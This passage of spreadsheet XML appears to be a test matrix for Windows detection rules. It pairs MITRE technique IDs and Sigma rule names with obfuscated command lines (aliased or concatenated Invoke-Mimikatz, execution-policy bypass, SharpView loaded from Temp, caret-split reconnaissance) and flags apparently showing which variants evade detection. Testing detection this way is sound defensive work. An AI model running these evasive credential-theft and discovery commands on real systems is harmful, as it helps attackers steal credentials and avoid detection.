          <t>powershell.exe -"Command" "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'"</t>
        </is>
      </c>
      <c r="F1822" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1822" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1822" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1822" s="43" t="n"/>
      <c r="J1822" s="43" t="n"/>
      <c r="K1822" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1823" ht="15.75" customHeight="1" s="42">
      <c r="A1823" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1823" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1823" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1823" s="43" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1823" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c ipconfig /a^ll</t>
        </is>
      </c>
      <c r="F1823" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1823" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1823" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1823" s="43" t="n"/>
      <c r="J1823" s="43" t="n"/>
      <c r="K1823" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1824" ht="15.75" customHeight="1" s="42">
      <c r="A1824" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1824" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1824" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1824" s="43" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1824" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c set C=config &amp;&amp; net %C% workstation</t>
        </is>
      </c>
      <c r="F1824" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1824" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1824" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1824" s="43" t="n"/>
      <c r="J1824" s="43" t="n"/>
      <c r="K1824" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1825" ht="15.75" customHeight="1" s="42">
      <c r="A1825" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1825" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1825" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1825" s="43" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1825" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c arp -"a"</t>
        </is>
      </c>
      <c r="F1825" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1825" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1825" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1825" s="43" t="n"/>
      <c r="J1825" s="43" t="n"/>
      <c r="K1825" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1826" ht="15.75" customHeight="1" s="42">
      <c r="A1826" s="43" t="inlineStr">
        <is>
          <t>t1016</t>
        </is>
      </c>
      <c r="B1826" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_command</t>
        </is>
      </c>
      <c r="C1826" s="43" t="inlineStr">
        <is>
          <t>Suspicious Network Command</t>
        </is>
      </c>
      <c r="D1826" s="43" t="inlineStr">
        <is>
          <t>a29c1813-ab1f-4dde-b489-330b952e91ae</t>
        </is>
      </c>
      <c r="E1826" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c route pr^int</t>
        </is>
      </c>
      <c r="F1826" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1826" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1826" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1826" s="43" t="n"/>
      <c r="J1826" s="43" t="n"/>
      <c r="K1826" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1827" ht="15.75" customHeight="1" s="42">
      <c r="A1827" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1827" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1827" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1827" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1827" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" /"ExecutionPolicy" Bypass -cOmmAND "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1827" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1827" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1827" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1827" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33)</t>
        </is>
      </c>
      <c r="J1827" s="43" t="n"/>
      <c r="K1827" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1828" ht="15.75" customHeight="1" s="42">
      <c r="A1828" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1828" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C1828" s="43" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D1828" s="43" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E1828" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-SmbConnection"</t>
        </is>
      </c>
      <c r="F1828" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1828" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1828" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1828" s="43" t="n"/>
      <c r="J1828" s="43" t="n"/>
      <c r="K1828" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1829" ht="15.75" customHeight="1" s="42">
      <c r="A1829" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1829" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1829" s="43" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1829" s="43" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1829" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "notepad C:\backup\passwords.log"</t>
        </is>
      </c>
      <c r="F1829" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1829" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1829" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1829" s="43" t="n"/>
      <c r="J1829" s="43" t="n"/>
      <c r="K1829" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1830" ht="15.75" customHeight="1" s="42">
      <c r="A1830" s="43" t="inlineStr">
        <is>
          <t>t1083</t>
        </is>
      </c>
      <c r="B1830" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_notepad_local_passwd_discovery</t>
        </is>
      </c>
      <c r="C1830" s="43" t="inlineStr">
        <is>
          <t>Notepad Password Files Discovery</t>
        </is>
      </c>
      <c r="D1830" s="43" t="inlineStr">
        <is>
          <t>3b4e950b-a3ea-44d3-877e-432071990709</t>
        </is>
      </c>
      <c r="E1830" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "notepad C:\backup\passwords.log"</t>
        </is>
      </c>
      <c r="F1830" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1830" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1830" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1830" s="43" t="n"/>
      <c r="J1830" s="43" t="n"/>
      <c r="K1830" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1831" ht="15.75" customHeight="1" s="42">
      <c r="A1831" s="43" t="inlineStr">
        <is>
          <t>t1124</t>
        </is>
      </c>
      <c r="B1831" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpview</t>
        </is>
      </c>
      <c r="C1831" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpView Execution</t>
        </is>
      </c>
      <c r="D1831" s="43" t="inlineStr">
        <is>
          <t>b2317cfa-4a47-4ead-b3ff-297438c0bc2d</t>
        </is>
      </c>
      <c r="E1831" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -noPrOFilE -"ExecutionPolicy" Bypass -c "Add-Type -Path 'C:\Windows\Temp\SharpView.dll'; [SharpView.Program]::GetDomainComputers()"</t>
        </is>
      </c>
      <c r="F1831" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1831" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1831" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1831" s="43" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33)</t>
        </is>
      </c>
      <c r="J1831" s="43" t="n"/>
      <c r="K1831" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1832" ht="15.75" customHeight="1" s="42">
      <c r="A1832" s="43" t="inlineStr">
        <is>
          <t>t1217</t>
        </is>
      </c>
      <c r="B1832" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dir_execution</t>
        </is>
      </c>
      <c r="C1832" s="43" t="inlineStr">
        <is>
          <t>File And SubFolder Enumeration Via Dir Command</t>
        </is>
      </c>
      <c r="D1832" s="43" t="inlineStr">
        <is>
          <t>7c9340a9-e2ee-4e43-94c5-c54ebbea1006</t>
        </is>
      </c>
      <c r="E1832" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "tree C:\ /F"</t>
        </is>
      </c>
      <c r="F1832" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1832" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1832" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1832" s="43" t="n"/>
      <c r="J1832" s="43" t="n"/>
      <c r="K1832" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1833" ht="15.75" customHeight="1" s="42">
      <c r="A1833" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1833" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1833" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1833" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1833" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F1833" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1833" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1833" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1833" s="43" t="n"/>
      <c r="J1833" s="43" t="n"/>
      <c r="K1833" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1834" ht="15.75" customHeight="1" s="42">
      <c r="A1834" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1834" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1834" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1834" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1834" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F1834" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1834" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1834" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1834" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J1834" s="43" t="n"/>
      <c r="K1834" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1835" ht="15.75" customHeight="1" s="42">
      <c r="A1835" s="43" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B1835" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C1835" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D1835" s="43" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E1835" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Invoke-Expression ('Get-' + 'WinEvent' + ' -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"') | Where-Object {$_.Id -eq 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F1835" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1835" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1835" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1835" s="43" t="n"/>
      <c r="J1835" s="43" t="n"/>
      <c r="K1835" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1836" ht="15.75" customHeight="1" s="42">
      <c r="A1836" s="43" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1836" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1836" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1836" s="43" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1836" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\System32\chcp.com "</t>
        </is>
      </c>
      <c r="F1836" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1836" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1836" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1836" s="43" t="n"/>
      <c r="J1836" s="43" t="n"/>
      <c r="K1836" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1837" ht="15.75" customHeight="1" s="42">
      <c r="A1837" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1837" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1837" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1837" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1837" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg.exe q^u^e^r^y HKLM\System\CurrentControlSet\Services"</t>
        </is>
      </c>
      <c r="F1837" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1837" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1837" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1837" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1837" s="43" t="n"/>
      <c r="K1837" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1838" ht="15.75" customHeight="1" s="42">
      <c r="A1838" s="43" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1838" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_query_registry</t>
        </is>
      </c>
      <c r="C1838" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE</t>
        </is>
      </c>
      <c r="D1838" s="43" t="inlineStr">
        <is>
          <t>970007b7-ce32-49d0-a4a4-fbef016950bd</t>
        </is>
      </c>
      <c r="E1838" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set KEY=currentcontrolset\services &amp;&amp; call reg.exe query HKLM\System\%KEY%"</t>
        </is>
      </c>
      <c r="F1838" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1838" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1838" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1838" s="43" t="inlineStr">
        <is>
          <t>Potential Configuration And Service Reconnaissance Via Reg.EXE (970007b7-ce32-49d0-a4a4-fbef016950bd)</t>
        </is>
      </c>
      <c r="J1838" s="43" t="n"/>
      <c r="K1838" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1839" ht="15.75" customHeight="1" s="42">
      <c r="A1839" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1839" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1839" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1839" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1839" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1839" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1839" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1839" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I183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39" s="43" t="n"/>
      <c r="K1839" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1840" ht="15.75" customHeight="1" s="42">
      <c r="A1840" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1840" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1840" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1840" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1840" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1840" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1840" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1840" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I184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0" s="43" t="n"/>
      <c r="K1840" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1841" ht="15.75" customHeight="1" s="42">
      <c r="A1841" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B1841" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1841" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1841" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1841" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1841" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1841" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1841" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1841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1" s="43" t="n"/>
      <c r="K1841" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1842" ht="15.75" customHeight="1" s="42">
      <c r="A1842" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1842" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1842" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1842" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1842" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1842" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1842" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1842" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1842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(02030f2f-6199-49ec-b258-ea71b07e03dc); Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1842" s="43" t="n"/>
      <c r="K1842" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1843" ht="15.75" customHeight="1" s="42">
      <c r="A1843" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1843" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1843" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1843" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1843" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1843" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1843" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1843" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1843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3" s="43" t="n"/>
      <c r="K1843" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1844" ht="15.75" customHeight="1" s="42">
      <c r="A1844" s="43" t="inlineStr">
        <is>
          <t>t1069</t>
        </is>
      </c>
      <c r="B1844" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1844" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1844" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1844" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F1844" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1844" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1844" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1844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4" s="43" t="n"/>
      <c r="K1844" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1845" ht="15.75" customHeight="1" s="42">
      <c r="A1845" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1845" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1845" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1845" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1845" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1845" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1845" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1845" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1845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5" s="43" t="n"/>
      <c r="K1845" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1846" ht="15.75" customHeight="1" s="42">
      <c r="A1846" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B1846" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1846" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1846" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1846" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F1846" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1846" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1846" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1846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6" s="43" t="n"/>
      <c r="K1846" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1847" ht="15.75" customHeight="1" s="42">
      <c r="A1847" s="43" t="inlineStr">
        <is>
          <t>t1049</t>
        </is>
      </c>
      <c r="B1847" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_network_connections_discovery</t>
        </is>
      </c>
      <c r="C1847" s="43" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE</t>
        </is>
      </c>
      <c r="D1847" s="43" t="inlineStr">
        <is>
          <t>1c67a717-32ba-409b-a45d-0fb704a73a81</t>
        </is>
      </c>
      <c r="E1847" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "net.exe u^s^e"</t>
        </is>
      </c>
      <c r="F1847" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1847" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1847" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1847" s="43" t="inlineStr">
        <is>
          <t>System Network Connections Discovery Via Net.EXE (1c67a717-32ba-409b-a45d-0fb704a73a81)</t>
        </is>
      </c>
      <c r="J1847" s="43" t="n"/>
      <c r="K1847" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1848" ht="15.75" customHeight="1" s="42">
      <c r="A1848" s="43" t="inlineStr">
        <is>
          <t>t1120</t>
        </is>
      </c>
      <c r="B1848" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_drive_enumeration</t>
        </is>
      </c>
      <c r="C1848" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration</t>
        </is>
      </c>
      <c r="D1848" s="43" t="inlineStr">
        <is>
          <t>63de06b9-a385-40b5-8b32-73f2b9ef84b6</t>
        </is>
      </c>
      <c r="E1848" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "fsutil fsinfo dri^ves"</t>
        </is>
      </c>
      <c r="F1848" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1848" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1848" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1848" s="43" t="inlineStr">
        <is>
          <t>Fsutil Drive Enumeration (63de06b9-a385-40b5-8b32-73f2b9ef84b6)</t>
        </is>
      </c>
      <c r="J1848" s="43" t="n"/>
      <c r="K1848" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1849" ht="15.75" customHeight="1" s="42">
      <c r="A1849" s="43" t="inlineStr">
        <is>
          <t>t1482</t>
        </is>
      </c>
      <c r="B1849" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C1849" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D1849" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E1849" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F1849" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1849" s="43" t="b">
        <v>0</v>
      </c>
